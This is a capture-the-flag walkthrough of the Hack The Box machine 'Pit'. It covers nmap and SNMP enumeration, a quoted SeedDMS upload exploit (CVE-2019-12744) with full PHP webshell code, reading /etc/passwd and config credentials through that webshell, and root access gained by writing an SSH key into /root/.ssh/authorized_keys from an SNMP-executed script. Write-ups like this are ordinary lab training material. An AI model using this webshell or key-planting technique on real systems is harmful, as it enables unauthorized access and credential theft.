# PIT

## Scanning

**NMAP**

* TCP

```
➜  ~ nmap -T4 -p- -A pit.htb
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-18 12:10 EDT
Nmap scan report for pit.htb (10.10.10.241)
Host is up (0.21s latency).
Not shown: 65532 filtered ports
PORT     STATE SERVICE         VERSION
22/tcp   open  ssh             OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey: 
|   3072 6f:c3:40:8f:69:50:69:5a:57:d7:9c:4e:7b:1b:94:96 (RSA)
|   256 c2:6f:f8:ab:a1:20:83:d1:60:ab:cf:63:2d:c8:65:b7 (ECDSA)
|_  256 6b:65:6c:a6:92:e5:cc:76:17:5a:2f:9a:e7:50:c3:50 (ED25519)
80/tcp   open  http            nginx 1.14.1
|_http-title: Test Page for the Nginx HTTP Server on Red Hat Enterprise Linux
9090/tcp open  ssl/zeus-admin?
| fingerprint-strings: 
|   GetRequest, HTTPOptions: 
|     HTTP/1.1 400 Bad request
|     Content-Type: text/html; charset=utf8
|     Transfer-Encoding: chunked
|     X-DNS-Prefetch-Control: off
|     Referrer-Policy: no-referrer
|     X-Content-Type-Options: nosniff
|     Cross-Origin-Resource-Policy: same-origin
|     <!DOCTYPE html>
|     <html>
|     <head>
|     <title>
|     request
|     </title>
|     <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <style>
|     body {
|     margin: 0;
|     font-family: "RedHatDisplay", "Open Sans", Helvetica, Arial, sans-serif;
|     font-size: 12px;
|     line-height: 1.66666667;
|     color: #333333;
|     background-color: #f5f5f5;
|     border: 0;
|     vertical-align: middle;
|     font-weight: 300;
|_    margin: 0 0 10p
| ssl-cert: Subject: commonName=dms-pit.htb/organizationName=4cd9329523184b0ea52ba0d20a1a6f92/countryName=US
| Subject Alternative Name: DNS:dms-pit.htb, DNS:localhost, IP Address:127.0.0.1
| Not valid before: 2020-04-16T23:29:12
|_Not valid after:  2030-06-04T16:09:12
|_ssl-date: TLS randomness does not represent time
```

*add `dms-pit.htb` to hosts file*

* UPD

  after a while i realize no way to start attack on TCP ports so go for UPD scan

```
➜  ~ sudo nmap -T5 -sU --top-ports 4 pit.htb
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-18 14:10 EDT
Nmap scan report for pit.htb (10.10.10.241)
Host is up (0.22s latency).

PORT    STATE         SERVICE
123/udp filtered      ntp
137/udp filtered      netbios-ns
161/udp open|filtered snmp
631/udp filtered      ipp

Nmap done: 1 IP address (1 host up) scanned in 1.92 seconds
```

`161/udp open|filtered snmp` it the way

## Enumeration

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-Mjja_SCCUaYdBYGOmtE%2Fimage.png?alt=media\&token=58d49fbe-20f2-418c-b711-5aa7c6fab3b9)

`cat 10.10.10.241.snmp`

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-MjjadeSSWdr9ydZiUrP%2Fimage.png?alt=media\&token=4a6c5cd0-28dd-46c7-92ab-e5688498f85c)

We find this directory `/seeddms51x/seeddms`

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-MjjagmYS6KeUyRzai_2%2Fimage.png?alt=media\&token=dd61362b-791a-4d36-afbf-862fd1361a47)

i tried some default credentials but nothing ...

back to SNMP file searching for Credintials

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-MjjakZ9TpS3JX6N-4_I%2Fimage.png?alt=media\&token=88428ce1-8c66-4340-bc22-3271ea178aa3)

after some tries credentials `michelle:michelle`

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-MjjamcVvfwyTHj6omYh%2Fimage.png?alt=media\&token=0b78fd51-f7b3-473e-99d7-98acefe18c68)

## Exploit

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-MjjaqbEhqBh6pxsJaIR%2Fimage.png?alt=media\&token=ba4815e2-43e2-4662-b963-b9bf3aaf7b71)

now we know the version of DMS `seedDMS 5.1.15`

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-MjjaubpUao3UtCE-HqS%2Fimage.png?alt=media\&token=5a76e185-b8a9-42b1-8a89-7b12c9bbd72e)

**exploit**

```
➜  ~ cat 47022.txt 
# Exploit Title: [Remote Command Execution through Unvalidated File Upload in SeedDMS versions <5.1.11]
# Google Dork: [NA]
# Date: [20-June-2019]
# Exploit Author: [Nimit Jain](https://www.linkedin.com/in/nimitiitk)(https://secfolks.blogspot.com)
# Vendor Homepage: [https://www.seeddms.org]
# Software Link: [https://sourceforge.net/projects/seeddms/files/]
# Version: [SeedDMS versions <5.1.11] (REQUIRED)
# Tested on: [NA]
# CVE : [CVE-2019-12744]

Exploit Steps:

Step 1: Login to the application and under any folder add a document.
Step 2: Choose the document as a simple php backdoor file or any backdoor/webshell could be used.

PHP Backdoor Code: 
<?php

if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
}

?>

Step 3: Now after uploading the file check the document id corresponding to the document.
Step 4: Now go to example.com/data/1048576/"document_id"/1.php?cmd=cat+/etc/passwd to get the command response in browser.

Note: Here "data" and "1048576" are default folders where the uploaded files are getting saved.
```

create backdoor

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-Mjjazf40rG3oFPmrehL%2Fimage.png?alt=media\&token=61b72236-0301-461a-8ba9-980a0bda4672)

in this directory `DMS /Docs /Users /Michelle /`

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-Mjjb5-nF_QD-Y-oebfk%2Fimage.png?alt=media\&token=6135585a-717f-4ab3-a86b-e0ac0fa24b53)

upload shell.php as `1.php` **step 3**

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-Mjjb8OQNj8nDapR8f6P%2Fimage.png?alt=media\&token=4bcdcd46-22e0-4d9c-b7a9-2207331a6abb)

`documentid=30` check yours ...

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-MjjbBwVIB5nMtOqqdMs%2Fimage.png?alt=media\&token=e75b63ed-495a-46ae-bec5-43d466f3deaf)

**step 4**

`http://dms-pit.htb/seeddms51x/data/1048576/30/1.php?cmd=cat%20/etc/passwd`

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-MjjbGCuBL3sXK1krUuA%2Fimage.png?alt=media\&token=1043ded2-557c-4242-beba-9c08776fd648)

shadow not accessible

reverse shell not working

i tried **Path Traversal** to access DB credentials it work

`http://dms-pit.htb/seeddms51x/data/1048576/30/1.php?cmd=cat%20../../../conf/settings.xml`

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-MjjbQLK_2wmMrumEJYX%2Fimage.png?alt=media\&token=319ae383-566f-4d0b-b819-9e306fc5bb68)

inspect this page

search username

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-MjjbTSjAQ3GhifLUvFf%2Fimage.png?alt=media\&token=6b5b0413-b68a-4a04-927e-1eb8bc733131)

lets use this credentials to login main App

after some tries Credentials `michelle:ied^ieY6xoquu`

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-MjjbW_2T5tRqVYmKXH-%2Fimage.png?alt=media\&token=fcbb2bdd-b126-466b-ab31-5aff86d2b22b)

WE IIIIIIIIIIIIIIIIIN 🎉

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-MjjbhhAMgN_ORckYu3Z%2Fimage.png?alt=media\&token=83f63fe8-53cf-4b92-a8cc-6967b8c034c3)

and Terminal tap calls us

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-MjjbjpGWqbQ8x7D3Qtl%2Fimage.png?alt=media\&token=4ed1e892-b830-4320-aa59-91963e265865)

* [x] USER FLAG

## Privilege Escalation

from snmp enum we find this

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-Mjjbovq5YuBsz0vQUKh%2Fimage.png?alt=media\&token=9dcf6363-1d0a-469b-8190-ec93dd066152)

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-MjjbsMlB5Jc_h6GAz3A%2Fimage.png?alt=media\&token=bb4e90b4-7ac1-497d-af3f-7f3a80f949a8)

can't access this dir

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-MjjbuNqvDKpEeHGZiFB%2Fimage.png?alt=media\&token=b1c14f03-e365-4317-ad83-a591c45029b8)

lets check permission on this dir

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-Mjjby0dGJZXwt8aGpld%2Fimage.png?alt=media\&token=21f3db7b-cdeb-4e51-95bf-990953411f23)

`michelle -wx` we can write and execute

Lets create a SSH payload with out public key and put it into the /usr/local/monitoring directory

on attacker machine

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-Mjjc-YCF-6DHGDQO6Z2%2Fimage.png?alt=media\&token=6cd7d37a-8f20-41c4-a4bc-cbd7c54b1cb8)

after creating the key place it in this payload and save

```
echo "your-public-ssh-key" > /root/.ssh/authorized_keys
```

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-Mjjc5iAFcdaCgtUavHE%2Fimage.png?alt=media\&token=461e3a5b-f51b-4f28-a854-cdba290a9a6a)

save as **check.sh**

start local server

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-MjjcBVCBmKJCbLht8_K%2Fimage.png?alt=media\&token=f1d90c0e-424c-4285-afe1-a09d67195fa3)

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-MjjcExOLeTv1FW7d7Jd%2Fimage.png?alt=media\&token=5f7f5278-b556-4da3-90aa-3080c573c6a0)

```
➜  ~ snmpwalk -m +MY-MIB -v2c -c public 10.10.10.241 nsExtendObjects
```

this line to execute script check [this](https://www.dpstele.com/snmp/what-does-oid-network-elements.php)

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-MjjcJ-Eo86xpjVD9JMF%2Fimage.png?alt=media\&token=fe9c52b2-4f0d-47a6-9ec1-1b285eb2e406)

* [x] ROOT FLAG